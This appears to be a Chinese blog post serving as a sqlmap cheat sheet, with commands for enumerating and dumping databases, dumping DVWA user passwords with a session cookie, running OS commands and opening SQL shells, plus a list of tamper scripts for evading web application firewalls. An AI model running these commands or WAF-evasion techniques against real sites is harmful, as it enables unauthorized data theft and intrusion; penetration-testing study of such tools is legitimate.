1、基本的语法

sqlmap 更新  sqlmap -update

具体的使用方法:

sqlmap -u url --current-user

sqlmap -u url --current-db

sqlmap -u url --tables -D "db_name"

sqlmap -u url --columns -T "tablename" users -D "db_name" -v 0

sqlmap -u url --dump -C "column_name" -T  "table_name" -D "db_name" -v

sqlmap -u url --privileges -U root

sqlmap -u url --proxy "http://127.0.0.1:8080" 代理注入

sqlmap -u url --SQL-shell

sqlmap -u url  -dump-all -v 0

sqlmap -u url --os-cmd=whoami

sqlmap -u url --tamper 通过编码绕过WAF

sqlmap -u url --technique  指定注入类型

1、1  使用cokire 或者 post作为参数:

sqlmap.py -u "url " --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1"--current-db

sqlmap.py -u "url" --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1" -D dvwa --table
  sqlmap.py -u "url" --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1" -D dvwa -T users --column
 sqlmap.py -u "url" --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1" -D dvwa -T users -C user,password --dump
 使用  -r参数 提交  HTTP头信息的文本
//读取表中全部字段值
  Sqlmap.py -u “url” -D dvwa -T users --dump‘’
使用宽字节注入:

POST数据包修改 添加 关键字部分使用 宽字节,比方说  name=121*&submit=%E6%9F%A5%   跑不出来的时候使tapmer

2、绕过WAF

判断是不是安装了 Waf       sqlmap.py -u “http://www.xxx.com” --identify-waf

./sqlmap.py -u http://127.0.0.1/test.php?id=1 -v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”

还有其他的空格替换脚本 space2mssqlblank.py and space2mysqlblank.py

charencode.py andchardoubleencode.py是两个用来打乱编码的tamper脚本,他们在绕过不同的关键词过滤时很有作用。

如果web应用使用asp/asp.net开发,charunicodeencode.pypercentage.py可以帮助你逃避Waf的检测。

空格被过滤可以使用space2comment.py , 过滤系统对大小写敏感可以使用randomcase.py

对应的脚本还有很多,这里我直接导出网上整理好的。

  • 使用方法--tamper xxx.py
  • apostrophemask.py用UTF-8全角字符替换单引号字符
  • apostrophenullencode.py用非法双字节unicode字符替换单引号字符
  • appendnullbyte.py在payload末尾添加空字符编码
  • base64encode.py 对给定的payload全部字符使用Base64编码
  • between.py分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=”
  • bluecoat.py 在SQL语句之后用有效的随机空白符替换空格符,随后用“LIKE”替换等于号“=”
  • chardoubleencode.py 对给定的payload全部字符使用双重URL编码(不处理已经编码的字符)
  • charencode.py 对给定的payload全部字符使用URL编码(不处理已经编码的字符)
  • charunicodeencode.py 对给定的payload的非编码字符使用Unicode URL编码(不处理已经编码的字符)
  • concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例
  • equaltolike.py 用“LIKE”运算符替换全部等于号“=”
  • greatest.py 用“GREATEST”函数替换大于号“>”
  • halfversionedmorekeywords.py 在每个关键字之前添加MySQL注释
  • ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例
  • lowercase.py 用小写值替换每个关键字字符
  • modsecurityversioned.py 用注释包围完整的查询
  • modsecurityzeroversioned.py 用当中带有数字零的注释包围完整的查询
  • multiplespaces.py 在SQL关键字周围添加多个空格
  • nonrecursivereplacement.py 用representations替换预定义SQL关键字,适用于过滤器
  • overlongutf8.py 转换给定的payload当中的所有字符
  • percentage.py 在每个字符之前添加一个百分号
  • randomcase.py 随机转换每个关键字字符的大小写
  • randomcomments.py 向SQL关键字中插入随机注释
  • securesphere.py 添加经过特殊构造的字符串
  • sp_password.py 向payload末尾添加“sp_password” for automatic obfuscation from DBMS logs
  • space2comment.py 用“/**/”替换空格符
  • space2dash.py 用破折号注释符“--”其次是一个随机字符串和一个换行符替换空格符
  • space2hash.py 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
  • space2morehash.py 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
  • space2mssqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
  • space2mssqlhash.py 用磅注释符“#”其次是一个换行符替换空格符
  • space2mysqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
  • space2mysqldash.py 用破折号注释符“--”其次是一个换行符替换空格符
  • space2plus.py 用加号“+”替换空格符
  • space2randomblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
  • unionalltounion.py 用“UNION SELECT”替换“UNION ALL SELECT”
  • unmagicquotes.py 用一个多字节组合%bf%27和末尾通用注释一起替换空格符
  • varnish.py 添加一个HTTP头“X-originating-IP”来绕过WAF
  • versionedkeywords.py 用MySQL注释包围每个非函数关键字
  • versionedmorekeywords.py 用MySQL注释包围每个关键字
  • xforwardedfor.py 添加一个伪造的HTTP头“X-Forwarded-For”来绕过WAF

sqlmap 绕过WAF的更多相关文章

  1. 如何使用SQLMAP绕过WAF

    WAF(web应用防火墙)逐渐成为安全解决方案的标配之一.正因为有了它,许多公司甚至已经不在意web应用的漏洞.遗憾的是,并不是所有的waf都是不可绕过的!本文将向大家讲述,如何使用注入神器SQLMa ...

  2. 使用sqlmap中tamper脚本绕过waf

    使用sqlmap中tamper脚本绕过waf 刘海哥 · 2015/02/02 11:26 0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击. 由于乌云知识库少了sqlmap- ...

  3. 使用sqlmap中的tamper脚本绕过waf

    使用sqlmap中tamper脚本绕过waf 脚本名:0x2char.py 作用:用UTF-8全角对应字符替换撇号字符 作用:用等价的CONCAT(CHAR(),...)对应替换每个(MySQL)0x ...

  4. sqlmap之waf绕过

    #一点补充 在老版本的安全狗中,可通过构造payload: http://xx.xx.xx.xx/sqli-labs/Less-2/index.php/x.txt?id=1 and 1=1 可通过in ...

  5. sqlmap注入之tamper绕过WAF脚本列表

    本文作者:i春秋作者——玫瑰 QQ2230353371转载请保留文章出处 使用方法--tamper xxx.py apostrophemask.py用UTF-8全角字符替换单引号字符 apostrop ...

  6. 一些绕过waf的笔记

    转自:http://fuck.0day5.com/archives/622.html 一.各种编码绕过1. ? 1 2 ?id=1 union select pass from admin limit ...

  7. Sqlmap过waf命令tamper各脚本的适用环境

    0x00 相信很多小伙伴和我一样感同身受,站上明明有注入可是被万恶的WAF拦截了或者过滤了,这时候就需要用到SQLMAP强大的tamper了. 0x01 使用方法--tamper xxx.py apo ...

  8. 如何绕过WAF

    目录 HTTP报文包体的解析 Transfer-Encoding Charset 溢量数据 HTTP协议兼容性 HTTP请求行种的空格 HTTP 0.9+Pipelining Websocket.HT ...

  9. 深入理解SQL注入绕过WAF和过滤机制

    知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...

  10. 深入了解SQL注入绕过waf和过滤机制

    知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 ...

随机推荐

  1. consul系列文章01---docker安装consul

    1.下载镜像 2.运行容器 docker run --name consul -d -p 8500:8500 --restart=always  consul agent -server -boots ...

  2. TienChin 渠道管理-前端展示渠道信息

    在编写 Vue 项目的时候我们可以使用 IDEA 当中提供的一个工具叫做 structure,也就是说可以很轻松的列举出当前 Vue 文件的大致结构,点那个就会跳转到对应的地方. 简简单单介绍一个编写 ...

  3. 【主流技术】15 分钟掌握 Redis 的安装部署和基本特性

    目录 前言 一.Redis 概述 1.1Redis 是什么? 1.2Redis 能做什么? 1.3基础知识 二.Redis 安装与基本命令 2.1Windows 安装 方式一 方式二 2.2Linux ...

  4. 4.2 Windows驱动开发:内核中进程线程与模块

    内核进程线程和模块是操作系统内核中非常重要的概念.它们是操作系统的核心部分,用于管理系统资源和处理系统请求.在驱动安全开发中,理解内核进程线程和模块的概念对于编写安全的内核驱动程序至关重要. 内核进程 ...

  5. 【链表】链表OJ-力扣2074. 反转偶数长度组的节点【超详细的算法解释】

    说在前面 今天博主给大家带来的是力扣上的一道链表OJ,完成这道题后,博主感觉这题覆盖了很多链表的解题思想,另外,这道题对指针的控制也是比较高的.在这里博主将这道好题分享给大家! 另外,对于链表等数据结 ...

  6. 一行命令找出 Linux 中所有真实用户

    哈喽大家好,我是咸鱼. 接触过 Linux 的小伙伴们都知道在 Linux (或者说类 Unix)中,有三种类型的用户: 超级用户(UID 为 0):即 root 用户,拥有最高权限. 系统用户(UI ...

  7. HBase-compact介绍(minor和major区别)

    一.minor和major的区别: Minor Compaction:指选取一些小的.相邻的HFile将他们合并成一个更大的HFile,但不会清理过期(TTL)和删除(打上Delete标记)的数据.  ...

  8. CF1849

    传送门 A 氵 B 在吃了五次罚时后,我终于放弃了卡常优先队列,并发现:把余 \(0\) 看作余 \(k\),答案就是余数从大到小排列的,每种余数内部又按照下标排序. C 我为什么没想到哈希?自我检讨 ...

  9. Slot 的含义

    Slot 解释 1)slot就是槽的意思,是一个资源单位,只有给task分配了一个slot之后,这个task才可以运行.slot分两种,map slot沪蓉reduce slot.另外,slot是一个 ...

  10. elasticstack-7.5.0部署实战

    1.Elastic Stack 数据搜索.分析和可视化工具 中文网: https://elkguide.elasticsearch.cn/beats/metric.html Elasticsearch ...